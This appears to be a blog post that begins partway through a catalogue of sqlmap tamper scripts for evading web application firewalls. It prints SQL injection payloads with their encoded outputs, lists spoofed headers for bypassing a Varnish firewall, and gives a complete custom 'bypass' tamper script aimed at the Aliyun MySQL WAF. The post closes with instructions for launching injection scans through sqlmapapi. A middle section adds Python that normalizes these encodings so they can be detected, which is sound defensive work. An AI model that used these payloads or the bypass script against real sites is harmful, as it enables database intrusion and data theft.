>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'

symboliclogical.py

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"

unionalltonnion.py

Replaces instances of UNION ALL SELECT with UNION SELECT counterpart

>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'

unmagicquotes.py

Replaces quote character (') with a multi-byte combo %BF%27 together with a generic comment at the end (to make it work)

Reference:

>>> tamper("1' AND 1=1")
'1%bf%27-- -'

uppercase.py

Replaces each keyword character with its upper case value (e.g. select -> SELECT)

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
>>> tamper('insert')
'INSERT'

varnish.py

Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall

Adds the header X-originating-IP: 127.0.0.1 to get past the firewall

Reference:

Examples:

>> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
>> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
>> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
>> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
>> X-remote-IP: * or %00 or %0A

versionedkeywords.py

Encloses each non-function keyword with (MySQL) versioned comment

Requirement:

  • MySQL

Tested against:

  • MySQL 4.0.18, 5.1.56, 5.5.11
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'

versionedmorekeywords.py

Encloses each keyword with (MySQL) versioned comment

Requirement:

  • MySQL >= 5.1.13

Tested against:

  • MySQL 5.1.56, 5.5.11
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py

Appends a fake HTTP header 'X-Forwarded-For' (and several similar headers)

headers["X-Forwarded-For"] = randomIP()
headers["X-Client-Ip"] = randomIP()
headers["X-Real-Ip"] = randomIP()
headers["CF-Connecting-IP"] = randomIP()
headers["True-Client-IP"] = randomIP()
headers["Via"] = "1.1 Chrome-Compression-Proxy"
headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0]

bypass

#!/usr/bin/env python2
#user by: XG

import re
from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        # ALiYun mysql
        # index.php?id=336699dfg

        retVal = re.sub(r" ", "%20", retVal)
        retVal = re.sub(r"\'\)%20AND%20", "%27%29%2f%2a%20%30%30%7d%7d%29%5d%5b%2a%2f%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"\)%20AND%20", "%29%2f%2a%30%30%7d%7d%29%5d%5b%2a%2f%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"\'%20AND%20", "%27%20%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"%20AND%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"%20OR%20NOT%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aOR%20NOT%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"%20OR%20", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aOR%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"=", "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aLIKE%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a", retVal)
        retVal = re.sub(r"\'%20UNION", "%27%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aUNION", retVal)
        retVal = re.sub(r"UNION%20SELECT%20", "UNION%0d%0a%20%2d%2d%20%81/*%99%20%0d%0a%0d%0a%0d%0aSELECT%0d%0a%20%2d%2d%20%81/*%99%0d%0a%0d%0a", retVal)
        retVal = re.sub(r"UNION%20ALL%20SELECT%20", "UNION%0d%0a%20%2d%2d%20%81/*%99%20%0d%0a%0d%0a%0d%0aALL%20SELECT%0d%0a%20%2d%2d%20%81/*%99%0d%0a%0d%0a", retVal)
        retVal = re.sub(r"%20FROM", "%0d%0a%20%2d%2d%20%87%0d%0aFROM", retVal)
        retVal = re.sub(r"FROM%20INFORMATION_SCHEMA\.", "FROM%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aINFORMATION_SCHEMA%0d%0a.", retVal)
        retVal = re.sub(r"CASE%20", "CASE%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
        retVal = re.sub(r"THEN%20", "THEN%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
        retVal = re.sub(r"ELT\(", "ELT%20%2d%2d%20%29%29%29%29%29%29%0d%0a%28", retVal)
        #retVal = re.sub(r"\(SELECT%20", "%28%20%2d%2d%0d%99%20%0d%0aSELECT%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
        #retVal = re.sub(r"\(SELECT%20", "%28%20%2d%2d%0d%99%5b%5d%20%0d%0aSELECT%0D%0A%0d%2d%2d%20%99%29%20%0d%0a", retVal)
        retVal = re.sub(r"\(SELECT%20", "%28%20%20%23%20%2f%2a%99%29%5d%5b%7b%7d%23%5b%5d%0aSELECT%20", retVal)
        retVal = re.sub(r"SELECT%20\(", "SELECT%20%2d%2d%20%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
        retVal = re.sub(r"CONCAT\(", "CONCAT%20%23%20%89%0d%0a%28", retVal)
        retVal = re.sub(r"CHR\(", "CHR%20%2d%2d%20%29%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
        retVal = re.sub(r"CHAR\(", "CHAR%20%2d%2d%20%29%29%29%29%5b%5d%7b%7d%0d%0a%28", retVal)
        retVal = re.sub(r"EXTRACTVALUE\(", "EXTRACTVALUE%20%23%20%89%0d%0a%28", retVal)

        #retVal = re.sub(r"%20INFORMATION_SCHEMA", "%20/*like%22%0d%0a%20%2d%2d%20%0d%22*/%20%0d%0a%20INFORMATION_SCHEMA%0d%0a", retVal)

    return retVal
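
Every tamper script above, and the custom Aliyun bypass script just shown, rewrites the same SQL into a different byte sequence, so a detector that pattern-matches the raw request misses most of them. The Python below is an added example, not part of this page or of sqlmap: it undoes the encodings these scripts apply (double URL encoding, %uXXXX, overlong UTF-8, full-width apostrophes, HTML entities, null bytes, inline and versioned comments, line-comment-plus-newline separators, alternative blanks) and then runs a few indicator regexes over the canonical form, which is how a WAF or log-analysis rule should see the payload. The sample inputs are tamper outputs quoted on this page plus one constructed output of the bypass script for the payload "1 AND 1=1"; the normalize and analyze functions, the decoding order and the indicator names are my own.

```python
import html
import re
import unicodedata
from urllib.parse import unquote_to_bytes

# Two-byte overlong UTF-8 (%C0xx / %C1xx) is never valid UTF-8, so mapping it back to
# the single ASCII byte it encodes (overlongutf8.py, overlongutf8more.py) cannot
# damage legitimate input.
OVERLONG = re.compile(r"%(C[01])%([89AB][0-9A-F])", re.I)
# IIS-style %uXXXX escapes (charunicodeencode.py).
UNICODE_URL = re.compile(r"%u([0-9A-F]{4})", re.I)

INDICATORS = {
    # No leading \b on purpose: MySQL still parses "1e0UNION" / "-.1UNION" (0eunion.py, misunion.py).
    "union-select": re.compile(r"(?<![A-Z_])UNION\s+(?:ALL\s+)?SELECT\b"),
    "boolean-condition": re.compile(r"\b(?:AND|OR)\s+\S+\s*(?:[=<>]|R?LIKE\b|(?:NOT\s+)?BETWEEN\b)"),
    "time-delay": re.compile(r"\b(?:SLEEP|BENCHMARK|GET_LOCK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b"),
    "schema-probe": re.compile(r"\bINFORMATION_SCHEMA\b|@@VERSION\b|\bVERSION\s*\("),
    "comment-terminator": re.compile(r"(?:--|#)\s*-?\s*$"),
}


def _decode_overlong(s):
    def repl(m):
        lead, trail = int(m.group(1), 16), int(m.group(2), 16)
        return "%%%02X" % (((lead & 0x1F) << 6) | (trail & 0x3F))
    return OVERLONG.sub(repl, s)


def _unquote(s):
    """URL-decode; fall back to latin-1 so %A0, %BF%27 (unmagicquotes.py) survive as characters."""
    raw = unquote_to_bytes(s.replace("+", " "))     # '+' is a space in a query string (space2plus.py)
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


def normalize(payload, max_rounds=3):
    """Return the canonical, upper-cased SQL fragment the DBMS would actually see."""
    s = payload
    for _ in range(max_rounds):                      # repeated rounds undo chardoubleencode.py
        prev = s
        s = _decode_overlong(s)
        s = UNICODE_URL.sub(lambda m: chr(int(m.group(1), 16)), s)
        s = _unquote(s)
        s = html.unescape(s)                         # &#39; and friends (htmlencode.py)
        if s == prev:
            break
    s = unicodedata.normalize("NFKC", s)             # full-width apostrophe -> ' (apostrophemask.py)
    s = s.replace("\x00", "")                        # appendnullbyte.py, apostrophenullencode.py
    s = re.sub(r"/\*(?!!).*?\*/", " ", s, flags=re.S)   # /**/ and /**_**/ act as blanks
    s = re.sub(r"/\*!\d*|\*/", " ", s)               # MySQL executes the body of /*!NNNNN ... */
    s = re.sub(r"(?:--|#)[^\n]*\n", " ", s)          # line comment + newline used as a separator
    s = re.sub(r"[\s\x01-\x1f\x7f]+", " ", s)        # tabs, CR/LF, %0B/%0C/%A0 blanks
    return s.strip().upper()


def analyze(raw):
    """Normalize one parameter value and return (canonical form, sorted indicator names)."""
    canonical = normalize(raw)
    return canonical, sorted(name for name, rx in INDICATORS.items() if rx.search(canonical))


# Tamper outputs quoted on this page, plus a constructed output of the Aliyun bypass
# script for the payload "1 AND 1=1" (last entry).
SAMPLES = [
    "%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545",
    "SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1",
    "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871",
    "1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227",
    "1 /*!00000AND 2>1*/--",
    "SELECT%A0id%0CFROM%0Dusers",
    "1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;",
    "1e0UNION ALL SELECT",
    "1%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aAND%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a1"
    "%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0aLIKE%0d%0a%20%2d%2d%20%5d%5b%81%20%0d%0a1",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        canonical, hits = analyze(raw)
        print("%-60r -> %r %s" % (raw[:58], canonical, hits))
```

The decoding loop repeats until the string stops changing, which is what defeats chardoubleencode.py; the price is that a literal percent sign in a genuine value can be over-decoded, which is acceptable for detection but not for anything that feeds the decoded value back to the application. Scripts that rewrite SQL semantics rather than bytes (between.py, equaltolike.py, plus2concat.py) are covered by the looser indicator regexes rather than by normalization.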

ACCESS

Related articles


API

Related articles

Usage

python3 sqlmapapi.py -s -H 0.0.0.0  # start the server; it listens on port 8775 (the default)

Once the server is running it can be driven through its HTTP endpoints or from the bundled command-line client. Binding to 0.0.0.0 exposes the API on every interface and the task endpoints have no authentication unless you configure it, so keep the server on localhost or restrict access with a firewall.

python3 sqlmapapi.py -c             # connect to the API on the local machine (default)

If all is well, we are in the client's command line.

The following commands are available in the command line:

help           show help
new ARGS       start a new scan task (e.g. 'new -u "http://testphp.vulnweb.com/artists.php?artist=1"')
use TASKID     switch to a task id (e.g. 'use c04d8c5c7582efb4')
data           get the data returned by the current task
log            get the scan log of the current task
status         get the scan status of the current task
option OPTION  get one option of the current task
options        get all options of the current task
stop           stop the current task
kill           kill the current task
list           list all tasks
version        show the version
flush          flush (delete) all tasks
exit           exit the client

Starting a new scan task

new -u 'http://testphp.vulnweb.com/artists.php?artist=1'

You can see that the client has switched to the ID of this task.

Each task is a single test target, and each task has its own ID.

Once the task is created, typing status returns its current state.

status

When a scan finishes, the SQLMAP API does not push a completion notice; you have to poll for it.

If returncode is 0, our injection succeeded. Type data to get the detailed results.

data

The returned data is in JSON format.

安全狗的自我修养

github haidragon

https://github.com/haidragon

posted @ 2022-11-03 09:23  syscallwww